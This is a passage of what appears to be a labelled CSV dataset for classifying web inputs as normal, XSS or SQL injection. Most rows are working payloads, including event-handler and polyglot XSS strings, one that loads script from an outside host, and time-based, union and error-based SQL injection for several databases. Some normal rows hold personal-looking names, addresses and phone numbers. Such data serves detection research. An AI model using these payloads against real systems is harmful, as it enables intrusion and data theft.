onpointerdown=alert(1)>XSS</dt>,1,XSS,5706 -"1' ) ) as bsvk where 5985 = 5985 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,15574 -"-2013"" ) ) as kisy where 3802 = 3802 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --",2,SQLi,14233 -1' ) where 4298 = 4298,2,SQLi,13751 -Join tables where valid,0,normal,23550 -<svg id=`x`onload=alert(1)>,1,XSS,9484 -onResizeEnd,1,XSS,9702 -(sleep(5)),2,SQLi,11419 -"<img draggable=""true"" ondragenter=""alert(1)"">test</img>",1,XSS,5546 -"<frame draggable=""true"" ondragstart=""alert(1)"">test</frame>",1,XSS,8146 -"<div draggable=""true"" contenteditable>drag me</div><listing ondragover=alert(1) contenteditable>drop here</listing>",1,XSS,5788 -"<IMG SRC=""jav&#x0A;ascript:alert(<WBR>'XSS');"">",1,XSS,1643 -<blink onpointerout=alert(1)>XSS</blink>,1,XSS,3715 -<header onpointerover=alert(1)>XSS</header>,1,XSS,7218 -ORDER BY 3--,2,SQLi,10280 -"<svg><path><animateMotion onrepeat=alert(1) dur=""1s"" repeatCount=""2"">",1,XSS,3951 --2233' or ( 1807 = 7274 ) *7274,2,SQLi,16969 -Let's decide where to go for our family vacation.,0,normal,24098 -"1' ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( 'qdhz' = 'qdhz",2,SQLi,21238 -"<style>@keyframes x{}</style><textarea style=""animation-name:x"" onanimationstart=""alert(1)""></textarea>",1,XSS,6435 -"<textarea onkeyup=""alert(1)"" contenteditable>test</textarea>",1,XSS,3624 -AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP),2,SQLi,10864 -"{""id"":null,""name"":""course""}",0,normal,25800 -"1"" ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,17534 -[ ](http://a?p=[[/onclick=alert(0) .]]),1,XSS,9469 -AND 1 = utl_inaddr.get_host_address ( ( SELECT COUNT ( DISTINCT ( USERNAME ) ) FROM SYS.ALL_USERS ) ) AND 'i' = 'i,2,SQLi,11998 -<dfn id=x tabindex=1 onfocus=alert(1)></dfn>,1,XSS,2658 -<keygen autofocus onfocusin=alert(1)>,1,XSS,3338 -"<acronym onmousemove=""alert(1)"">test</acronym>",1,XSS,1867 -<image2 onpointerout=alert(1)>XSS</image2>,1,XSS,3888 -<animatemotion onpointerenter=alert(1)>XSS</animatemotion>,1,XSS,4401 -"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( 'cgou' like 'cgou",2,SQLi,16306 -"-5420' ) union all select 2508,2508,2508,2508,2508,2508,2508#",2,SQLi,20017 -1' or sleep ( 5 ),2,SQLi,18377 -"<div id=""95""><svg xmlns=""http://www.w3.org/2000/svg"" xmlns:xlink=""http://www.w3.org/1999/xlink"">",1,XSS,9141 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19",2,SQLi,10795 -1' ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( 'yhku' like 'yhku,2,SQLi,16043 -"-9672%"" ) ) ) order by 1#",2,SQLi,19342 -<sVg><scRipt %00>alert&lpar;1&rpar; {Opera},1,XSS,791 -) ) or sleep ( __TIME__ ) = ',2,SQLi,11988 -"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*",2,SQLi,11015 -"<html xmlns=""http://www.w3.org/1999/xhtml"">",1,XSS,9173 -"-1876'|| ( select 'itfc' from dual where 9584 = 9584 union all select 9584,9584,9584,9584,9584,9584,9584,9584--",2,SQLi,20825 -<link id=x tabindex=1 onbeforeactivate=alert(1)></link>,1,XSS,6347 -"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3-- ampw",2,SQLi,12338 -"-7296%' ) ) ) union all select 9322,9322,9322,9322--",2,SQLi,16786 -"{""id"":null,""firstName"":""Anita"",""lastName"":""Tode"",""address"":""145 ROWAN STREET, FAYETTEVILLE NC 28301"",""city"":""270"",""telephone"":""2772673967""}",0,normal,25850 -"<style>:target {transform: rotate(180deg);}</style><figure id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></figure>",1,XSS,7734 -select ( case when ( 9732 = 7136 ) then 9732 else 9732* ( select 9732 from information_schema.character_sets ) end ) #,2,SQLi,13598 -1' ) where 5331 = 5331,2,SQLi,19952 -Let's explore where the art museum is located.,0,normal,24166 -"<acronym oncut=""alert(1)"" contenteditable>test</acronym>",1,XSS,6482 -"<plaintext draggable=""true"" ondragstart=""alert(1)"">test</plaintext>",1,XSS,2316 -"1' ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( 'ltym' = 'ltym",2,SQLi,19129 -1 ) and 8417 = 5276#,2,SQLi,15004 -"<comment><img src=""</comment><img src=x onerror=javascript:alert(1))//"">",1,XSS,587 -"1 ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( 3294 = 3294",2,SQLi,19187 -I'm thinking of where to have a quiet getaway.,0,normal,24023 -<u onpointerover=alert(1)>XSS</u>,1,XSS,5071 --3161' ) or 8501 = 1796,2,SQLi,17928 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--",2,SQLi,10516 -select ( case when ( 3716 = 4021 ) then 3716 else 3716* ( select 3716 from information_schema.character_sets ) end ) #,2,SQLi,15532 -<script>window.name='javascript:alert(1)';</script><svg onload=location=name>,1,XSS,141 -"1 ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,16088 -<nav id=x tabindex=1 ondeactivate=alert(1)></nav><input id=y autofocus>,1,XSS,2448 -%BCscript%BEalert(%A2XSS%A2)%BC/script%BE,1,XSS,1339 -"<address onmouseout=""alert(1)"">test</address>",1,XSS,8448 -"<i onmousedown=""alert(1)"">test</i>",1,XSS,8367 -<header id=x tabindex=1 onfocus=alert(1)></header>,1,XSS,1838 -Select alternate.,0,normal,24940 -"<big draggable=""true"" ondrag=""alert(1)"">test</big>",1,XSS,6419 -"1%' or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,20872 -<code onpointerout=alert(1)>XSS</code>,1,XSS,7627 -"select * from users where id = 1 or ""; ) "" = 1 or 1 = 1 -- 1",2,SQLi,12137 -Select save.,0,normal,24773 -database,0,normal,23338 -Select pack.,0,normal,24877 -"1"""" ( .'. ( , ( .",2,SQLi,21597 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15",2,SQLi,10462 --8760 ) where 8277 = 8277 union all select 8277--,2,SQLi,20019 -"<div draggable=""true"" contenteditable>drag me</div><sup ondrop=alert(1) contenteditable>drop here</sup>",1,XSS,1705 -"select * from users where id = '1' union select ( \ ) ,@@VERSION -- 1'",2,SQLi,11529 -"1' ) ) as crzr where 5373 = 5373 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,18975 -"<span draggable=""true"" ondragstart=""alert(1)"">test</span>",1,XSS,6789 -"<div draggable=""true"" contenteditable>drag me</div><code ondrop=alert(1) contenteditable>drop here</code>",1,XSS,5166 -"<menu onclick=""alert(1)"">test</menu>",1,XSS,4257 -"1' ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( 'wqme' = 'wqme",2,SQLi,12663 -onActivate,1,XSS,9623 -1 ) ) as efjb where 4642 = 4642 order by 1#,2,SQLi,20271 -1'+ ( select wpkh where 5842 = 5842,2,SQLi,20708 -"<maction actiontype=""statusline#http://google.com"" xlink:href=""javascript:alert(2)"">CLICKME</maction>",1,XSS,9214 -"1 ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users )",2,SQLi,15573 -Plant some fragrant herbs.,0,normal,22913 -"<style>@keyframes x{}</style><h1 style=""animation-name:x"" onanimationstart=""alert(1)""></h1>",1,XSS,1711 -"javascript:/*""//'//`//\""//--></script></title></style></textarea></template></noembed></noscript><script>//<frame/<svg/*/onload= alert()//</script>",1,XSS,9527 -"<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #",1,XSS,9252 -"<xml:namespace prefix=""t"">",1,XSS,9352 -<td onpointerleave=alert(1)>XSS</td>,1,XSS,7506 -"{""id"":null,""name"":""MarineAngemon""}",0,normal,26084 -"<IMG SRC=x oncuechange=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1175 -"call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ""cwat"" like ""cwat",2,SQLi,17547 -1 ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( 6062 = 6062,2,SQLi,15345 -1 where 9393 = 9393 waitfor delay '0:0:5'--,2,SQLi,22094 -"1 where 3175 = 3175 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,18589 -"-8988"" ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ""dyxh"" like ""dyxh",2,SQLi,14970 -"1%"" ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( ""%"" = """,2,SQLi,20089 -"1"" where 4652 = 4652 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,17837 -"1"" ) ) as swwb where 4244 = 4244",2,SQLi,21500 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dl id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></dl>",1,XSS,7250 -"1"" ) or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,22142 -1' rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and 'mabd' = 'mabd,2,SQLi,13644 -trim,0,normal,23375 -"select * from users where id = 1 union select 1<@,version ( ) -- 1",2,SQLi,11715 -"-8982'+ ( select anyd where 5358 = 5358 union all select 5358,5358,5358,5358,5358,5358#",2,SQLi,21146 -"javascript:'/*`/*'/*""/*\""/*<FRAME SRC= javascript:/**/-alert()//--></title></textarea></style></noscript></noembed></template></script><script>//<svg onload= alert()//</script>",1,XSS,9548 -"1 where 6383 = 6383 or elt ( 6272 = 6272,sleep ( 5 ) ) --",2,SQLi,21138 -"1%' ) ) union all select null,null--",2,SQLi,22079 -"<output onbeforepaste=""alert(1)"" contenteditable>test</output>",1,XSS,7025 -"<style>:target {transform: rotate(180deg);}</style><span id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></span>",1,XSS,6286 -"1"" ) ) as gqxk where 9199 = 9199 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --",2,SQLi,19875 -1 ) where 7159 = 7159,2,SQLi,14104 -"{""id"":null,""firstName"":""Ros"",""lastName"":""Probo"",""address"":""1023 Yishun Ind Pk A #01-09"",""city"":""452"",""telephone"":""2553078474""}",0,normal,25369 -"1 ) ) as hrks where 7637 = 7637 or elt ( 6272 = 6272,sleep ( 5 ) ) --",2,SQLi,18814 -"<cite onmouseenter=""alert(1)"">test</cite>",1,XSS,3370 -1' ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,15753 -"Select quickly, please.",0,normal,24638 -"1' or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and 'jiyx' = 'jiyx",2,SQLi,14436 -"<rtc onmouseup=""alert(1)"">test</rtc>",1,XSS,2086 -Select your weapon.,0,normal,25007 -<svg><meta onload=alert(1)></meta>,1,XSS,1692 -Select a tea flavor to relax.,0,normal,24437 -"1'+ ( select 'dbvq' where 2045 = 2045 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,22501 -"-2821"" ) ) ) union all select 3920,3920,3920,3920,3920,3920,3920#",2,SQLi,17037 -1'|| ( select 'kitk' where 6311 = 6311,2,SQLi,18988 -"1 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) # zwck",2,SQLi,21325 -<div onpointerleave=alert(1)>XSS</div>,1,XSS,1872 -"1"" ) ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( ""jgoq"" = ""jgoq",2,SQLi,22608 -"<figure draggable=""true"" ondragleave=""alert(1)"">test</figure>",1,XSS,8374 -Where's the missing keychain?,0,normal,22782 -<area id=x tabindex=1 onbeforeactivate=alert(1)></area>,1,XSS,4569 -"1"" ) ) as esho where 8864 = 8864 order by 1--",2,SQLi,16245 -"=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20-- -+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23",2,SQLi,22724 -"1 ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,22052 -"1%' ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,22303 -<ins id=x tabindex=1 onfocusin=alert(1)></ins>,1,XSS,7308 -<marquee id=x tabindex=1 ondeactivate=alert(1)></marquee><input id=y autofocus>,1,XSS,8252 -"select * from users where id = 1 or ""._"" or 1 = 1 -- 1",2,SQLi,11916 -<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>,1,XSS,1641 -&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;,1,XSS,1336 -"{""id"":null,""firstName"":""Jeff"",""lastName"":""Lam Tian Hung"",""address"":""101 CHESAPEAKE BLVD, ELKTON MD 21921"",""city"":""6"",""telephone"":""2125100154""}",0,normal,25396 -"-4984%"" ) ) ) union all select 6980,6980,6980,6980,6980,6980,6980,6980#",2,SQLi,12284 -<script>document.vulnerable=true;</script>,1,XSS,1420 -"1"" ) ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,21200 -Select your significance.,0,normal,25062 -"<strike onmouseup=""alert(1)"">test</strike>",1,XSS,1789 -Select conspire.,0,normal,24930 -1' ) as ibaw where 2130 = 2130 and 9198 = 9198--,2,SQLi,19499 -<tfoot id=x tabindex=1 onbeforedeactivate=alert(1)></tfoot><input autofocus>,1,XSS,8114 -"select * from users where id = 1 or ""{1"" = 1 or 1 = 1 -- 1",2,SQLi,11879 -"1"" where 1852 = 1852 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,17187 -"-3628"" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,15265 -Insert the form.,0,normal,23077 -"1%"" ) union all select null,null,null#",2,SQLi,19885 -"iif ( 1149 = 4765,1,1/0 )",2,SQLi,19909 -<base onpointerenter=alert(1)>XSS</base>,1,XSS,4187 -"<menuitem onbeforecut=""alert(1)"" contenteditable>test</menuitem>",1,XSS,5849 -"<sup oncut=""alert(1)"" contenteditable>test</sup>",1,XSS,8118 -<head id=x tabindex=1 ondeactivate=alert(1)></head><input id=y autofocus>,1,XSS,3208 -admin' or 1=1#,2,SQLi,9978 -=+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+,2,SQLi,11292 -"><STYLE>@importjavascript:alert('XSS')"";</STYLE>",1,XSS,1635 -1' ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( ( 'lajk' = 'lajk,2,SQLi,13794 -<discard onpointerup=alert(1)>XSS</discard>,1,XSS,7376 -"-3525"" where 3522 = 3522 union all select 3522,3522,3522,3522,3522,3522,3522,3522,3522#",2,SQLi,16351 -"1' ) where 2802 = 2802 union all select null,null,null#",2,SQLi,21712 -"-1422%"" ) or make_set ( 9539 = 9519,9519 ) and ( ""%"" = """,2,SQLi,18969 -"<style>@keyframes slidein {}</style><param style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></param>",1,XSS,2426 -&',2,SQLi,9937 -Let's decide where to go for a spa retreat.,0,normal,24000 -<figcaption id=x tabindex=1 onfocusin=alert(1)></figcaption>,1,XSS,5524 -"1"" ) ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ""pmmr"" = ""pmmr",2,SQLi,19180 -or '' = ',2,SQLi,11628 -Select the best candidate.,0,normal,22755 -"<meta content=""&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)"" http-equiv=""refresh""/>",1,XSS,309 -<strike onpointerup=alert(1)>XSS</strike>,1,XSS,8014 -<address id=x tabindex=1 ondeactivate=alert(1)></address><input id=y autofocus>,1,XSS,6120 -select ( case when ( 9376 = 4521 ) then 1 else 9376* ( select 9376 from master..sysdatabases ) end ) --,2,SQLi,19798 -"1 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,18660 -<form id=x tabindex=1 onbeforedeactivate=alert(1)></form><input autofocus>,1,XSS,2929 -"1'+ ( select 'sbvh' where 8539 = 8539 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ) +'",2,SQLi,12356 -ORDER BY 25--,2,SQLi,10302 -"1"" ) as boeh where 2571 = 2571 union all select null#",2,SQLi,17694 -select ( case when ( 3140 = 4625 ) then 1 else 3140* ( select 3140 from master..sysdatabases ) end ) --,2,SQLi,18619 -"1"" ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ""nbfe"" = ""nbfe",2,SQLi,12431 -"1"" ) ) ) and 4124 = 7245 and ( ( ( ""tuom"" = ""tuom",2,SQLi,15396 -"1%"" or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ""%"" = """,2,SQLi,17545 -"<del onmouseenter=""alert(1)"">test</del>",1,XSS,6225 -<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->,1,XSS,402 -Where did you find that inspiring artwork?,0,normal,23958 -1' in boolean mode ) rlike sleep ( 5 ) #,2,SQLi,14968 -"1"" ) ) ) and 4967 = 8866 and ( ( ( ""jzyn"" like ""jzyn",2,SQLi,15687 -"union ( select NULL, NULL, NULL, NULL, NULL, ( select @@version ) ) --",2,SQLi,11920 -user,0,normal,23353 -"1%"" and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",2,SQLi,13132 -"&lt;SCRIPT&gt;document&#46;write(\""&lt;SCRI\"");&lt;/SCRIPT&gt;PT SRC=\""http&#58;//ha&#46;ckers&#46;org/xss&#46;js\""&gt;&lt;/SCRIPT&gt;",1,XSS,1003 -"1' ) where 6672 = 6672 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,12408 --7452 where 2224 = 2224 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,18412 -document.documentURI,1,XSS,2013 -"<spacer onbeforecut=""alert(1)"" contenteditable>test</spacer>",1,XSS,2528 -"1%"" ) ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( ""%"" = """,2,SQLi,22550 -"<IMG SRC=javascript:alert(""XSS"")>",1,XSS,759 -"{""id"":null,""name"":""Gible""}",0,normal,25907 -Select disagree.,0,normal,24758 -<;IMG SRC=javascript:alert(';XSS';)>;,1,XSS,1536 -<animatetransform onpointerover=alert(1)>XSS</animatetransform>,1,XSS,2442 -"<mark onbeforepaste=""alert(1)"" contenteditable>test</mark>",1,XSS,6877 -"<style>@keyframes slidein {}</style><script style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></script>",1,XSS,2158 -Check conditions where needed.,0,normal,23543 -<discard onpointerleave=alert(1)>XSS</discard>,1,XSS,7918 -"1' ) ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( 'ewwi' = 'ewwi",2,SQLi,18301 -"<video id=x controls onfocus=alert(1)><source src=""validvideo.mp4"" type=video/mp4></video>",1,XSS,8082 -"<div id=""129""><svg>",1,XSS,9104 -1' ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( 'iuki' = 'iuki,2,SQLi,15202 -<article onpointerup=alert(1)>XSS</article>,1,XSS,6037 -<strike id=x tabindex=1 ondeactivate=alert(1)></strike><input id=y autofocus>,1,XSS,5016 --9708' where 8150 = 8150 or 6872 = 6872--,2,SQLi,16514 -"<t:set attributeName=""innerHTML"" targetElement=""x"" to=""&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;"">//[""'`-->]]>]</div>",1,XSS,9306 -"1"" and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,15179 -"1' ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( 'dhwt' = 'dhwt",2,SQLi,20836 -select ( case when ( 8208 = 7960 ) then 8208 else 8208* ( select 8208 from information_schema.character_sets ) end ) #,2,SQLi,19830 -"<a href=""\x1Ejavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,517 -"1"" and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ""gddl"" like ""gddl",2,SQLi,21213 -"=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--",2,SQLi,22720 -"1"" ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ""qyew"" = ""qyew",2,SQLi,19736 -"{""id"":null,""firstName"":""Ng"",""lastName"":""Beng Tee"",""address"":""81A Geylang Road 02-02"",""city"":""768"",""telephone"":""2822503236""}",0,normal,25574 -<i onpointerdown=alert(1)>XSS</i>,1,XSS,7828 -"<p ondblclick=""alert(1)"">test</p>",1,XSS,7467 -<nav id=x tabindex=1 onfocusin=alert(1)></nav>,1,XSS,8391 -"{""id"":null,""firstName"":""Evon"",""lastName"":""Choong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25281 -<svg><li onload=alert(1)></li>,1,XSS,2167 -Select your conclude.,0,normal,25185 -",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23",2,SQLi,11059 -"1' ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( 'fele' = 'fele",2,SQLi,14756 -"1"" ) ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( ""epwi"" like ""epwi",2,SQLi,21592 -1 and 4595 = 4595#,2,SQLi,18654 -<plaintext id=x tabindex=1 onfocusin=alert(1)></plaintext>,1,XSS,8736 -"1 ) ) as khvx where 7533 = 7533 union all select null,null,null,null,null,null,null,null--",2,SQLi,13757 -"<style>:target {transform: rotate(180deg);}</style><menu id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></menu>",1,XSS,7388 -Select the right size for the clothes.,0,normal,24222 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><small id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></small>",1,XSS,6847 -"1 ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 2952 = 2952",2,SQLi,21585 -"1"" and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ""jgcv"" = ""jgcv",2,SQLi,15422 -<address id=x tabindex=1 onactivate=alert(1)></address>,1,XSS,1836 -"""""><script language=""JavaScript""> alert('X \nS \nS');</script>",1,XSS,1273 -"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( 7240 = 7240",2,SQLi,15504 -1'+ ( select 'iify' where 6257 = 6257 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) ) +',2,SQLi,16448 -<span onfocusout=alert(1) tabindex=1 id=x></span><input autofocus>,1,XSS,7555 -Select scheme.,0,normal,24928 -"1%"" union all select null,null,null,null,null,null#",2,SQLi,18659 -"-3261"" ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( ""yxms"" = ""yxms",2,SQLi,19757 -"1"" ) where 1330 = 1330 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --",2,SQLi,12388 -"<form onkeyup=""alert(1)"" contenteditable>test</form>",1,XSS,3694 -"<IMG SRC=x onmousedown=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1154 --4595' ) where 4892 = 4892 order by 1--,2,SQLi,18772 -<dialog onpointerover=alert(1)>XSS</dialog>,1,XSS,7714 -1'|| ( select 'xhcr' from dual where 9279 = 9279,2,SQLi,13423 -"<D3""<""/OncLick=""1>[confirm``]""<"">z",1,XSS,9027 -"<spacer onclick=""alert(1)"">test</spacer>",1,XSS,8574 --1700%' or 4149 = 3391#,2,SQLi,14091 -1 ) ) ) and 6358 = 6735,2,SQLi,13786 -"javascript:""/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \"" onmouseover=/*<svg/*/onload=alert()//>",1,XSS,9518 -Locate items where applicable.,0,normal,23464 -"<base onclick=""alert(1)"">test</base>",1,XSS,3423 -"<style onmouseover=""alert(1)"">test</style>",1,XSS,2705 -<samp 